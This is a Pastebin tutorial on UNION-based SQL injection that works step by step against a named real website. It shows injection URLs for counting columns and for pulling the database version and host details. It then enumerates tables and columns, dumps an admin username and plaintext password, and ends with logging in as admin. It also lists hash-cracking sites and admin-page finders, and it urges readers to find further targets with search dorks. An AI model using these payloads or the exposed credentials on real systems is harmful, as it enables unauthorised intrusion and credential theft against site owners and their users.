Kyfx

SQli UNION ERROR TUT with DIOS

Oct 30th, 2015
1,766
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.29 KB | None | 0 0
  1.  
  2. Difficulty: Basic Level 2 and Intermediate
  3. Requirements: Patience,intuition and understanding
  4. Estimated time to read the chapter: 25-30 min (reading thoroughly will help you understand better)
  5. The method used to extract information from a database in a website using SQL injection queries on the URL/Address bar is what we're gonna learn today.
  6. Previous tutorial: Bypassing Login Pages with SQL injection (Basics and Intermediate)
  7. There are many types of SQL injection when it comes to web hacking
  8. What we learned in the previous tutorial was the only Basics where were used it to bypass Admin/User logins.
  9. However, what will you do if can't bypass it even though it's vulnerable to SQL injection?
  10. Well, the answer is simple. You do the process on your URL/Address bar instead of the text boxes on an admin/user login page
  11. Common Types of SQL injection are:
  12. Code:
  13. UNION Based SQL injection
  14. String Based SQL injection
  15. Error Based SQL injection
  16. Double Query SQL injection
  17. Blind SQL injection
  18. MsSQL injection
  19. What we are going to learn today is what we call UNION Based SQL injection
  20. Alright before we start we need to know how a website works while it stores Login information/pages/pictures/etc. in its database
  21. Lets just say that our website will look like this :
  22. "http://www.site.com/index.php?id=5"
  23. Notice at the end of the URL, "id=5"
  24. This is what the query will look like
  25. PHP Code:
  26. SELECT * FROM index
  27. WHERE id = 5
  28. Alright, now you know a bit of how the website works, let's get hacking Hehe
  29. Step1: Finding the vulnerability in a website
  30. It'll be like a small puzzle you have to solve. See, you can't just hack a website like http://www.site.com -.-
  31. To hack a website, you need to scan it yourself by clicking links and find out if there's something like "index.php?id=XXX" where "XXX" is a random integer (number) or string (word).
  32. Alright now to find sites vulnerable to SQLi is using Google Dorks.
  33. If you don't know how to use dorks, visit Part 1 of this project to learn all about them
  34. Once you've found a site vulnerable to SQLi, it's time to execute queries.
  35. For this tutorial, we'll be using "http://www.leadacidbatteryinfo.org" as an example.
  36.  
  37. Try browsing the website and see if you can find links like "index.php?id=xxx"
  38. It can be anything like "details.php?id=xxx" or "gallery.php?id="
  39. Just find an address with a number at the end of the URL
  40. Here's what I found "http://www.leadacidbatteryinfo.org/newsdetail.php?id=51"
  41.  
  42. Now to test for vulnerabilities is by ADDING a quote " ' " at the end of the url i.e after the integer or string
  43. So it'll look like this,
  44. Code:
  45. http://www.leadacidbatteryinfo.org/newsdetail.php?id=51'
  46.  
  47. Now you'll notice an error saying
  48. Code:
  49. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
  50. Spoiler (Click to View)
  51. This shows that the website is vulnerable to SQL injection.
  52. How is this possible?
  53. Look at the query when we added a quote " ' "
  54. PHP Code:
  55. SELECT * FROM article
  56. WHERE id = 5 '
  57. Notice that, their database never stored "id = 5 ' "
  58. This is why they return an error result
  59. Now that we know the website is vulnerable to SQL injection, let's advance to the next process
  60. Step2: Finding the number of columns a website has
  61.  
  62. This is the part where most people had commonly misunderstood.
  63. To get to the point, what we're about to do is find how many columns the website has using NoError/Error statements.
  64. Alright lets get started.
  65. The query we'll be using is "order by X--" where "X" is a random integer (number)
  66. Start by entering "order by 25--"
  67. Enter it at the end of the URL, so it'll look like this
  68. Code:
  69. http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 25--
  70. Error, there are no 25 columns, so it'll be less than 25
  71.  
  72. Now lets try "order by 20--"
  73. Code:
  74. http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 20--
  75. Still Error, so there are less than 20 columns
  76.  
  77. How about we go down a bit to "order by 5--"
  78. Code:
  79. http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 5--
  80. aha! No errors. So let's see if there are more than 5 columns
  81.  
  82. Now lets go up to "order by 11--"
  83. Code:
  84. http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 11--
  85. Hmm, no errors I see. So it's obvious that there could be more than 11 columns
  86.  
  87. See if we can increase to "order by 12--"
  88. Code:
  89. http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 12--
  90. Error! So this means the last number that returned no error is 11
  91. Therefore, the website has 11 columns
  92.  
  93. Tips:
  94. An error while scanning for number of columns will look like this
  95. Spoiler (Click to View)
  96. While No errors will show the page as normal Smile
  97. Step3: Now that we found the number of Columns, time to Execute the UNION SELECT statement
  98. First off, we need to know what does "UNION SELECT" means
  99. Lets say we have 2 tables, "users" and "admin"
  100. Basically, UNION SELECT is a statement where all these information will be collected as one.
  101. Look at this query
  102. PHP Code:
  103. SELECT * FROM users
  104. UNION SELECT * FROM admin
  105. If we perform the UNION SELECT statement, we can get both users and admin information from their database
  106. The point is that, UNION SELECT returns our results with the information we need
  107. If you want to find vulnerable columns, use UNION SELECT
  108. If you want to find version of database, UNION SELECT
  109. If you want admin information! use UNION SELECT Hehe
  110. Alright, now that we know something about the Union function, lets continue.
  111.  
  112. Take our website that has 11 columns and add a "UNION SELECT" statement.
  113. Here's how our query will look like
  114. Code:
  115. http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--
  116. This is what you would normally do if you use UNION function while SQL injecting a website
  117.  
  118. Focus on something like this, "index.php?id=-X UNION SELECT N--"
  119. Where "X" is a random integer/string and "N" is the number of columns followed by two hyphens " -- " and another hyphen " - " beside "X"
  120. Step4: Random numbers appear on screen, the next step
  121. Alright I'm pretty sure you'll find a bunch of numbers showing up on the screen.
  122. These are known as "vulnerable columns" which states that those vulnerable columns have stored data inside them we need to extract.
  123. Here's how it'll look like:
  124. Spoiler (Click to View)
  125. You need to inject the number at the very top (always at the very top)
  126. So, in this case we have number "8"
  127. Now you might be asking, what can I do with a vulnerable column?
  128. Well here's what you can get-- INFORMATION!
  129. You need a lot of information to study from the website, here are a couple of examples.
  130.  
  131. Replace the vulnerable column i.e number 8 with a statement
  132. Statements:
  133. Code:
  134. @@version, version()
  135. database(),
  136. user(),
  137. @@hostname
  138. @@datadir
  139. Their functions
  140. @@version/version() = find the version of the database
  141. database() = find the current database
  142. user() = find the user information
  143. @@hostname = Current hosting info
  144. @@datadir = directory of the data of the website
  145.  
  146. To find the version of the database in the website, replace the vulnerable column i.e number 8 with "@@version" or "version()
  147. It'll look like this
  148. Code:
  149. http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,@@version,9,10,11--
  150. Results:
  151. Code:
  152. 5.1.52-log
  153. So the database version is 5, which is good because it'll be easier to SQL inject the website.
  154. Note:
  155. Database version less than 5 "<5" = you need to guess tables (a bit hard work)
  156. Database version greater than 5 ">5" = easy to inject with another function i.e group_concat
  157.  
  158. If you ever want to SQLi a website with version <5, then you can guess the tables with the following below
  159. Code:
  160. user
  161. username
  162. usernames
  163. admin
  164. admins
  165. users
  166. manager
  167. account
  168. accounts
  169. member
  170. login
  171. logins
  172. members
  173. tbl_user
  174. tbl_users
  175. tbl_admin
  176. tbl_admins
  177. tbl_member
  178. tbl_members
  179. tbladmins
  180. memberlist
  181. tbluser
  182. tblusers
  183. tblmanager
  184. tblmanagers
  185. tblclients
  186. tblservers
  187. adminuser
  188. usertbl
  189. userstbl
  190. admintbl
  191. adminstbl
  192. id
  193. tuser
  194. tusers
  195. uid
  196. userid
  197. user_id
  198. auid
  199. adminpass
  200. LoginID
  201. FirstName
  202. LastName
  203. cms_user
  204. cms_member
  205. cms_users
  206. cms_members
  207. cms_admin
  208. cms_admins
  209. user_admin
  210. user_info
  211. user_list
  212. user_login
  213. user_logins
  214. user_names
  215. userrights
  216. userinfo
  217. userlist
  218. webadmin
  219. webadmins
  220. Webmaster
  221. Webuser
  222. product
  223. products
  224. tblproducts
  225. tblproduct
  226. tbl_tbadmin
  227. Adminlogin
  228. We'll be knowing how to get the tables in the next step.
  229. But for now, let's see what we can get with other statements
  230. Lets try all statements at once shall we
  231. The URL will look like this,
  232. Code:
  233. http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(database(),version(),@@datadir,@@hostname,user()),9,1​0,11--
  234. Results:
  235. Code:
  236. 32908_leadacidbatteryinfoorg5.1.52-log/mnt/cluster/data/mysql1.myregisteredsite.com32908_user116602@lnh-www1h.bluehalo.myregisteredsite.com
  237. 3
  238. We have almost every information we have about the website
  239. Look close here, we used a command "group_concat"
  240. Here's its function:
  241. Group_concat = Gets every information at once i.e grouping them with the help of statements. Ex. group_concat(database())
  242. Note:Group_concat won't work with versions less than 5
  243. Step5:Getting the table names
  244. What are tables?
  245. Tables contain columns and columns contain the data
  246. It's like a stack (table) of books (columns) and data inside the books (data inside the columns)
  247. Alright, first lets look up some functions we're gonna use to extract table names (Important)
  248. Code:
  249. group_concat = grouping up data to a specific statement
  250. table_name = tables names to be shown on screen
  251. from = location of a specified statement
  252. information_schema.tables = information in the database with table names in it
  253. table_schema = tables in a database
  254. database() = current database in the website
  255. 0x0a = a Hex code that creates a new line for organizing tables in an order
  256. Now lets combine those functions and make up a query that will give us the table names
  257. So, here's what our link will look like:
  258. Code:
  259. http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(table_name,0x0a),9,10,11 from information_schema.tables where table_schema=database()--
  260. In here, we replaced our vulnerable column with "group_concat(table_name,0x0a)"
  261. and then we added a
  262. "from information_schema.tables where table_schema=database()--"
  263. after the last column (excluding the two hyphens after 11)
  264. Results on table names:
  265. Code:
  266. pdigclicks ,pdigengine ,pdigexcludes ,pdigincludes ,pdigkeywords ,pdiglogs ,pdigsite_page ,pdigsites ,pdigspider ,pdigtempspider ,tbladmin ,tblbanner ,tblbanner_page ,tblfaq ,tblncategory ,tblnews
  267. Spoiler (Click to View)
  268. Alright now that we've found the tables, what you're gonna have to do is
  269. that, you have to find tables where user/admin information are stored
  270. In this case, "tbladmin" seems to be having an admin information stored in it.
  271. It's all about predicting and expecting what's behind every table you see
  272. Okay, before proceeding to the next step, make sure you remember the statements we used in order to get the tables.
  273. Replace and Add the following
  274. Vulnerable Column = replace with "group_concat(table_name,0x0a)"
  275. After the last column = Add "from information_schema.tables where table_schema=database()--"
  276. Also, don't forget about UNION SELECT before the column numbers and the hyphen ( - ) before "X" at index.php?id=X where "X" is a random integer/string
  277. Step6:Getting Columns from Tables
  278. Alright obviously, our next task is to get the column names from a specific table which in our case was "tbladmin'
  279. To do this, we're gonna have to alter some queries a bit
  280. Now look closely at this syntax:
  281. Code:
  282. http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(column_name,0x0a),9,10,11 from information_schema.columns where table_name=0x74626c61646d696e--
  283. Here's what we replaced:
  284. table_name = replaced by "column_name"
  285. information_schema.tables = replaced by "information_schema.columns"
  286. table_schema = replaced by "table_name"
  287. database() = replaced by "0x74626c61646d696e--"
  288. Now that you know the replacements in our syntax, you still might be wondering what's up with the last part where entered "0x74626c61646d696e--"
  289. First of all, these are known as Hex
  290. To make a Hex readable, we put "0x" at the beginning
  291. I'll explain this briefly. So our table name was "tbladmin"
  292. To enter that table using the syntax above, we have to convert that table name to Hex
  293. In order to do that, visit this website:
  294. http://www.swingnote.com/tools/texttohex.php
  295. It's a text to hex converter
  296. Enter "tbladmin" in the text box and hit convert
  297. You'll notice the results will be "74626c61646d696e" (that's the hex)
  298. Now to make it readable to the website, add "0x" at the beginning
  299. So it will be:
  300. Code:
  301. 0x74626c61646d696e
  302.  
  303. Now you know how Hex works, lets look up some functions we replaced and know their uses (Important)
  304. Code:
  305. group_concat(column_name,0x0a) = grouping the column names we're going to extract
  306. information_schema.columns = column names stored in database
  307. table_name = extracting column from a specific table
  308. 0xHEX_Code_Table = Specific table name converted to hex
  309. Results after extracting column names from tables:
  310. Code:
  311. adminid ,username ,password ,dom
  312. Spoiler (Click to View)
  313. Now that we've got the columns from that table, it's time to extract the information.
  314. What we're gonna need here is obviously only the "username" and "password"
  315. Step7:Getting Data from Columns
  316. Alright, lets extract the information
  317. Look closely at the syntax:
  318. Code:
  319. http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password,0x0a),9,10,11 from tbladmin--
  320. Keep this formula-like syntax in your mind whenever you want to extract data from columns
  321. Code:
  322. http://www.site.com/index.php?id=-X UNION SELECT N,group_concat("columnName,0x3a,columnName,0x0a) from "tablename"--
  323. Where "X" is a random integer/string followed by a hyphen ( - ) while "N" is the number/position of the column and "columnName" is the column you want to extract data while "tablename" is where you extract data from a specific table then two hyphens in the end ( -- )
  324. CONTINUED BELOW
  325. Now for revising,
  326. column names = username, password
  327. separator = 0x3a (a hex for a colon " : ")
  328. table name = tbladmin
  329. Once you execute that syntax, you get the username and password separated by a colon
  330. Results after executing the syntax:
  331. Code:
  332. ishir:ishir123
  333. Username: ishir
  334. Password: ishir123
  335. Special cases: Hashed Usernames and Passwords
  336. Most websites will have their passwords hashed as MD5
  337. In this case you'll need to crack them.
  338. Using some websites will help you
  339. Here's a list of Hash cracking websites:
  340. Code:
  341. www.md5decrypter.co.uk/
  342. www.md5this.com/
  343. www.md5crack.com/
  344. http://hashchecker.de/find.html
  345. An MD5 Hash will look like this:
  346. Code:
  347. 21232f297a57a5a743894a0e4a801fc3 -- 32 characters
  348. A SHA-1 Hash will look like this:
  349. Code:
  350. d033e22ae348aeb5660fc2140aec35850c4da997 -- 40 characters
  351. I'll make up a detailed tutorial on Hash cracking soon.
  352. But for now, refer to this for a little knowledge about hashes
  353. http://hackforums.net/showthread.php?tid=1393830
  354. Credits to Haxor and Insidepro
  355.  
  356. Last Step: Finding the admin page and logging in for the goodsDevlish
  357. Alright, now that we have our admin login info
  358. Username: ishir
  359. Password: ishir123
  360. It's time to find the login pages
  361. To do this, you can use Admin Page Finders
  362. Here's some you can use
  363. >>Scorpion Admin Page Finder<<
  364. http://sc0rpion.ir/af/
  365. >>Outlaw Admin Page Finder<<
  366. http://www.tools.th3-0utl4ws.com/admin-finder/
  367. >>Napsterakos Admin Page Finder<<
  368. http://hackforums.net/showthread.php?tid...ight=HaviJ
  369. >>HaviJ Injector/Cracker and Admin page finder<<
  370. http://hackforums.net/showthread.php?tid...age+finder
  371. Alright after scanning the website for admin pages, you should see something like this:
  372. Code:
  373. http://www.leadacidbatteryinfo.org/admin/
  374. Now all you have to do is enter the admin details you extracted from their databases and login as an admin!
  375. However, some websites could be already hacked and messed up
  376. Which in our case, this website was already messed up in such a way you can't login as an admin anymore.
  377. These are just the basics of SQL injection.
  378. There are lots of websites to hack and more to practice with.
  379. Just so that you'll get a clear view of this tutorial, look up a demonstration video on how I inject a site with UNION Based/Normal SQL injection:
Advertisement
Add Comment
Please, Sign In to add comment